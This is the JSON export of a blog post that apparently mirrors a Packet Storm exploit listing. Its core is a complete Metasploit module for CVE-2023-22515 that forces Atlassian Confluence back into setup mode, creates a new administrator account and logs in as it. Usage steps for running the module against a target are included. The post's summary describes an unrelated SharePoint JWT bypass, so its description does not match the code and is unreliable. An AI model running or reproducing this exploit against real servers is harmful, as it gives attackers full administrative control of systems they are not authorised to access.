{"id":27750,"date":"2025-11-26T12:50:40","date_gmt":"2025-11-26T12:50:40","guid":{"rendered":"http:\/\/localhost\/?p=27750"},"modified":"2025-11-26T12:50:40","modified_gmt":"2025-11-26T12:50:40","slug":"confluence-8x-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27750","title":{"rendered":"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:35&#8243;,&#8221;description&#8221;:&#8221;Metasploit module proof of concept exploit that demonstrates an authentication bypass vulnerability Confluence version 8.x&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Confluence 8.x Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212105&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-22515&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Confluence 8.x Privilege Escalation                                                                                         |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.atlassian.com\/software\/confluence                                                                               |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    1. Summary :\\n       a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE\u20112023\u201129357. (https:\/\/packetstorm.news\/files\/id\/207960\/)\\n       The flaw allows an attacker to craft an unsigned JWT token with \\&#8221;alg\\&#8221;: \\&#8221;none\\&#8221; and impersonate any SharePoint user, \\n       including Site Administrators, without possessing valid credentials.\\n       The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.\\n    \\n    ===============\\n    # Save \\u0026 Usage \\n    ===============\\n    \\n    1. Save module as:\\n       modules\/auxiliary\/admin\/http\/confluence_cve_2023_22515.rb\\n    \\n    2. Reload Metasploit:\\n       msfconsole\\n       reload_all\\n    \\n    3. Use module:\\n       use auxiliary\/admin\/http\/confluence_cve_2023_22515\\n    \\n    4. Set options:\\n       set RHOSTS https:\/\/target.com\\n       set TARGETURI \/\\n       set USERNAME pleasepatch\\n       set PASSWORD Password2\\n    \\n    5. Run:\\n       run\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    auxiliary               :\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    ##\\n    # This file is part of the Metasploit Framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;Atlassian Confluence Unauthenticated Privilege Escalation (CVE\u20112023\u201122515)&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module exploits CVE-2023-22515, an authentication bypass and setup\\n            reopening vulnerability in Atlassian Confluence Data Center and Server.\\n    \\n            An attacker can force Confluence into setup mode, then create a NEW\\n            administrator account and authenticate with full admin privileges.\\n    \\n            This module replicates the exact behavior of the PoC Python script:\\n            1- trigger vulnerability via \/server-info.action?setupComplete=false\\n            2- create admin user\\n            3- authenticate via REST API\\n          },\\n          &#8216;Author&#8217;         =\\u003e [\\n            &#8216;Chocapikk &#8211; PoC&#8217;,     \\n            &#8216;indoushka &#8211; Full Metasploit conversion&#8217;\\n          ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;CVE&#8217;, &#8216;2023-22515&#8217;],\\n            [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/Chocapikk\/CVE-2023-22515&#8217;]\\n          ],\\n          &#8216;Platform&#8217;       =\\u003e &#8216;linux&#8217;,\\n          &#8216;Arch&#8217;           =\\u003e ARCH_ALL,\\n          &#8216;Targets&#8217;        =\\u003e [[&#8216;Automatic&#8217;, {}]],\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;2023-10-04&#8217;,\\n          &#8216;DefaultTarget&#8217;  =\\u003e 0\\n        ))\\n    \\n        register_options(\\n          [\\n            OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;]),\\n            OptString.new(&#8216;USERNAME&#8217;,  [true, &#8216;Admin username to create&#8217;, &#8216;pleasepatch&#8217;]),\\n            OptString.new(&#8216;PASSWORD&#8217;,  [true, &#8216;Admin password to create&#8217;, &#8216;Password2&#8217;])\\n          ]\\n        )\\n      end\\n    \\n      #\\n      # Check Vuln\\n      #\\n      def check\\n        v = trigger_setup\\n        return Exploit::CheckCode::Vulnerable if v\\n        Exploit::CheckCode::Safe\\n      end\\n    \\n      #\\n      # Exploit\\n      #\\n      def exploit\\n        print_status(\\&#8221;Triggering setup mode bypass on target&#8230;\\&#8221;)\\n        unless trigger_setup\\n          fail_with(Failure::NotVulnerable, &#8216;Could not reopen setup mode.&#8217;)\\n        end\\n    \\n        print_good(\\&#8221;Setup mode reopened successfully \u2714\\&#8221;)\\n    \\n        print_status(\\&#8221;Creating new administrator account&#8230;\\&#8221;)\\n        unless create_admin\\n          fail_with(Failure::UnexpectedReply, &#8216;Failed to create admin user&#8217;)\\n        end\\n    \\n        print_good(\\&#8221;Admin account created successfully \u2714\\&#8221;)\\n    \\n        print_status(\\&#8221;Authenticating to REST API as #{datastore[&#8216;USERNAME&#8217;]} &#8230;\\&#8221;)\\n    \\n        if authenticate_user\\n          print_good(\\&#8221;Successfully logged in as #{datastore[&#8216;USERNAME&#8217;]}! \u2714 FULL ADMIN PWNED \u2714\\&#8221;)\\n        else\\n          fail_with(Failure::NoAccess, &#8216;Authentication failed after account creation&#8217;)\\n        end\\n      end\\n    \\n      #\\n      # Step 1 \u2014 Trigger vulnerability\\n      #\\n      def trigger_setup\\n        send_req(\\n          \\&#8221;GET\\&#8221;,\\n          normalize_uri(target_uri.path, \\&#8221;server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false\\&#8221;)\\n        )\\u0026.code == 200\\n      end\\n    \\n      #\\n      # Step 2 \u2014 Create Admin\\n      #\\n      def create_admin\\n        data = {\\n          \\&#8221;username\\&#8221; =\\u003e datastore[&#8216;USERNAME&#8217;],\\n          \\&#8221;fullName\\&#8221; =\\u003e datastore[&#8216;USERNAME&#8217;],\\n          \\&#8221;email\\&#8221; =\\u003e \\&#8221;#{datastore[&#8216;USERNAME&#8217;]}@localhost\\&#8221;,\\n          \\&#8221;password\\&#8221; =\\u003e datastore[&#8216;PASSWORD&#8217;],\\n          \\&#8221;confirm\\&#8221; =\\u003e datastore[&#8216;PASSWORD&#8217;],\\n          \\&#8221;setup-next-button\\&#8221; =\\u003e \\&#8221;Next\\&#8221;\\n        }\\n    \\n        res = send_req(\\&#8221;POST\\&#8221;, normalize_uri(target_uri.path, \\&#8221;setup\\&#8221;, \\&#8221;setupadministrator.action\\&#8221;), data)\\n    \\n        return false unless res\\n    \\n        if res.body.include?(\\&#8221;Setup Successful\\&#8221;) ||\\n           res.body.include?(\\&#8221;A user with this username already exists\\&#8221;)\\n          return true\\n        end\\n    \\n        false\\n      end\\n    \\n      #\\n      # Step 3 \u2014 Validate Login\\n      #\\n      def authenticate_user\\n        auth = Rex::Proto::Http::Client::BasicAuthHeader.new(\\n          datastore[&#8216;USERNAME&#8217;],\\n          datastore[&#8216;PASSWORD&#8217;]\\n        )\\n    \\n        res = send_req(\\n          \\&#8221;GET\\&#8221;,\\n          normalize_uri(target_uri.path, \\&#8221;rest\/api\/user?username=#{datastore[&#8216;USERNAME&#8217;]}\\&#8221;),\\n          nil,\\n          auth\\n        )\\n    \\n        return false unless res \\u0026\\u0026 res.code == 200\\n        true\\n      end\\n    \\n      #\\n      # Unified request\\n      #\\n      def send_req(method, uri, data=nil, auth=nil)\\n        begin\\n          send_request_cgi({\\n            &#8216;method&#8217; =\\u003e method,\\n            &#8216;uri&#8217;    =\\u003e uri,\\n            &#8216;ctype&#8217;  =\\u003e &#8216;application\/x-www-form-urlencoded&#8217;,\\n            &#8216;data&#8217;   =\\u003e data,\\n            &#8216;authorization&#8217; =\\u003e auth ? auth.to_s : nil,\\n            &#8216;headers&#8217; =\\u003e {\\n              \\&#8221;X-Atlassian-Token\\&#8221; =\\u003e \\&#8221;no-check\\&#8221;,\\n              \\&#8221;User-Agent\\&#8221; =\\u003e \\&#8221;Metasploit &#8211; CVE-2023-22515\\&#8221;\\n            }\\n          }, 5)\\n        rescue ::Rex::Error::RequestTimeout\\n          return nil\\n        end\\n      end\\n    end\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212105&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;3.0&#8243;,&#8221;vectorString&#8221;:&#8221;CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;baseScore&#8221;:10,&#8221;baseSeverity&#8221;:&#8221;CRITICAL&#8221;,&#8221;attackVector&#8221;:&#8221;NETWORK&#8221;,&#8221;attackComplexity&#8221;:&#8221;LOW&#8221;,&#8221;privilegesRequired&#8221;:&#8221;NONE&#8221;,&#8221;userInteraction&#8221;:&#8221;NONE&#8221;,&#8221;scope&#8221;:&#8221;CHANGED&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;integrityImpact&#8221;:&#8221;HIGH&#8221;,&#8221;availabilityImpact&#8221;:&#8221;HIGH&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212105\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:35&#8243;,&#8221;description&#8221;:&#8221;Metasploit module proof of concept exploit that demonstrates an authentication bypass vulnerability Confluence version 8.x&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Confluence 8.x Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212105&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-22515&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : Confluence 8.x&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-27750","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27750\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:35&#8243;,&#8221;description&#8221;:&#8221;Metasploit module proof of concept exploit that demonstrates an authentication bypass vulnerability Confluence version 8.x&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Confluence 8.x Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212105&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-22515&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Confluence 8.x...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27750\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-26T12:50:40+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27750#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27750\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105\",\"datePublished\":\"2025-11-26T12:50:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27750\"},\"wordCount\":1011,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27750#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27750\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27750\",\"name\":\"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-26T12:50:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27750#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27750\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27750#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27750","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:35&#8243;,&#8221;description&#8221;:&#8221;Metasploit module proof of concept exploit that demonstrates an authentication bypass vulnerability Confluence version 8.x&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Confluence 8.x Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212105&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-22515&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Confluence 8.x...","og_url":"https:\/\/zero.redgem.net\/?p=27750","og_site_name":"zero redgem","article_published_time":"2025-11-26T12:50:40+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27750#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27750"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105","datePublished":"2025-11-26T12:50:40+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27750"},"wordCount":1011,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27750#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27750","url":"https:\/\/zero.redgem.net\/?p=27750","name":"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-26T12:50:40+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27750#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27750"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27750#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Confluence 8.x Privilege Escalation_PACKETSTORM:212105"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27750","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27750"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27750\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27750"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27750"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27750"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}